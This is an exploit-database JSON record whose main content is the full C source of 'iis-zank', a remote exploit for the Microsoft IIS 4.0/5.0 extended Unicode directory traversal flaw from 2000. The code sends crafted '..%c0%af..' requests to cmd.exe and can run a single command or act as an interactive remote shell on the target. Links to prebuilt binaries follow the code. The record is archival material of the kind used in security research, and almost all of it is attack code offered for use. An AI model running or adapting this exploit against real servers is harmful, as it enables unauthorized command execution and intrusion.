Description
Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (9)
{"lastseen": "2020-04-01T19:04:31", "references": [], "description": "\nMicrosoft IIS 4.05.0 and PWS - Extended Unicode Directory Traversal (9)", "edition": 1, "reporter": "Optyx", "exploitpack": {"type": "remote", "platform": "windows"}, "published": "2000-11-18T00:00:00", "title": "Microsoft IIS 4.05.0 and PWS - Extended Unicode Directory Traversal (9)", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.5, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2000-11-18T00:00:00", "id": "EXPLOITPACK:98BA80090B24C9F785BBCAE2DE02A3B1", "href": "", "viewCount": 6, "sourceData": "/****************************************************************************\\\n** **\n** Microsoft IIS 4.0/5.0 Extended UNICODE Directory Traversal Exploit **\n** proof of theory exploit cuz it's wednesday and i'm on the couch **\n** **\n** brought to you by the letter B, the number 7, optyx, and t12 **\n** optyx - <optyx@uberhax0r.net optyx@newhackcity.net> **\n** t12 - <t12@uberhax0r.net> **\n** **\n** greetz go out to aempirei, a gun toatin' gangstah' hustler' player **\n** motherfucker who isn't with us anymore, miah, who's GTA2 game was **\n** was most entertaining tonight, Cathy, who provided the trippy light **\n** to stare at, and to KT, for providing me with hours of decent **\n** conversation. 
**\n** **\n\\****************************************************************************/\n\n#include <stdio.h>\n#include <netdb.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/socket.h>\n#include <sys/types.h>\n#include <netinet/in.h>\n#include <arpa/inet.h>\n#include <signal.h>\n#include <errno.h>\n#include <fcntl.h>\n\nvoid usage(void) \n{\n fprintf(stderr, \"usage: ./iis-zank <-t target> <-c 'command' or -i>\"); \n fprintf(stderr, \" [-p port] [-t timeout]\\n\"); \n exit(-1);\n}\n\nint main(int argc, char **argv) \n{\n int i, j;\n int port=80;\n int timeout=3;\n int interactive=0;\n char temp[1];\n char host[512]=\"\"; \n char cmd[1024]=\"\";\n char request[8192]=\"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+\";\n struct hostent *he;\n struct sockaddr_in s_addr;\n\n printf(\"iis-zank_bread_chafer_8000_super_alpha_hyper_pickle.c\\n\");\n printf(\"by optyx and t12\\n\");\n\n for(i=0;i<argc;i++) \n\t{ if(argv[i][0] == '-') {\n\t\t for(j=1;j<strlen(argv[i]);j++) \n\t\t \t{\n\t\t\t switch(argv[i][j]) \n\t\t\t \t{\n\t\t\t\t case 't':\n\t\t\t\t \tstrncpy(host, argv[i+1], sizeof(host));\n\t\t\t\t \tbreak;\n\t\t\t\t case 'c':\n\t\t\t\t \tstrncpy(cmd, argv[i+1], sizeof(cmd));\n\t\t\t\t \tbreak;\n\t\t\t\t case 'h':\n\t\t\t\t \tusage();\n\t\t\t \t \tbreak;\n\t\t\t\t case 'o':\n\t\t\t\t\ttimeout=atoi(argv[i+1]); \n\t\t\t\t \tbreak;\n\t\t\t\t case 'p':\n\t\t\t\t \tport=atoi(argv[i+1]);\n\t\t\t\t \tbreak;\n\t\t\t\t case 'i':\n\t\t\t\t \tinteractive=1;\n\t\t\t\t \tbreak;\n\t\t\t\t default:\n\t\t\t\t break;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n if(!strcmp(host, \"\")) \n\t{\n\t fprintf(stderr, \"specify target host\\n\");\n\t usage();\n\t}\n\n if(!strcmp(cmd, \"\") && !interactive) \n\t{\n\t fprintf(stderr, \"specify command to execute\\n\");\n\t usage();\n\t}\n\n printf(\"]- Target - %s:%d\\n\", host, port);\n if(!interactive)\n \t printf(\"]- Command - %s\\n\", cmd);\n printf(\"]- Timeout - %d seconds\\n\", timeout);\n if((he=gethostbyname(host)) == NULL) 
\n\t{\n \t fprintf(stderr, \"invalid target\\n\");\n\t usage();\n\t}\n\n do\n \t{\n\n\t if(interactive)\n\t \t {\n\t\t cmd[0]=0;\n\t\t printf(\"\\nC> \");\n\t\t if(fgets(cmd, sizeof(cmd), stdin) == NULL)\n\t\t \t fprintf(stderr, \"gets() error\\n\"); \n\t\t cmd[strlen(cmd)-1]='\\0';\n\t\t if(!strcmp(\"exit\", cmd))\n\t\t \t exit(-1);\n\t\t }\n\n \t for(i=0;i<strlen(cmd);i++) \n\t\t {\n\t \t if(cmd[i]==' ')\n\t\t \tcmd[i]='+';\n\t\t }\n\n\t strncpy(request, \n\t\t \"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+\",\n\t\t sizeof(request));\n \t strncat(request, cmd, sizeof(request) - strlen(request));\t\n \t strncat(request, \"\\n\", sizeof(request) - strlen(request));\n\n \t s_addr.sin_family = PF_INET;\n \t s_addr.sin_port = htons(port);\n \t memcpy((char *) &s_addr.sin_addr, (char *) he->h_addr, \n \t\tsizeof(s_addr.sin_addr));\t\n\n \t if((i=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) \n\t\t {\n\t \t fprintf(stderr, \"cannot create socket\\n\");\n\t \t exit(-1);\n\t\t }\n\n \t alarm(timeout);\n \t j = connect(i, (struct sockaddr *) &s_addr, sizeof(s_addr));\n \t alarm(0);\n\n \t if(j==-1) \n\t\t {\n\t \t fprintf(stderr, \"cannot connect to %s\\n\", host);\n\t \t exit(-1);\n\t \t close(i);\n\t\t }\n\n\t if(!interactive)\n \t \t printf(\"]- Sending request: %s\\n\", request);\n\n \t send(i, request, strlen(request), 0);\n\n\t if(!interactive)\n \t \t printf(\"]- Getting results\\n\");\n\n \t while(recv(i,temp,1, 0)>0) \n\t\t {\n \t alarm(timeout);\n\t \t printf(\"%c\", temp[0]);\n \t alarm(0);\n\t\t }\t\n\n }\n while(interactive);\n\n close(i);\t\n return 0;\n}\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/190-1.exe\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/190-2.obsd\n\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/190-3.linux\n\n// milw0rm.com [2000-11-18]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, 
"cvss3": {}, "_state": {"dependencies": 1645642179, "score": 1659818015}, "_internal": {"score_hash": "8a94af14bf497b568c2244129f490307"}}
{}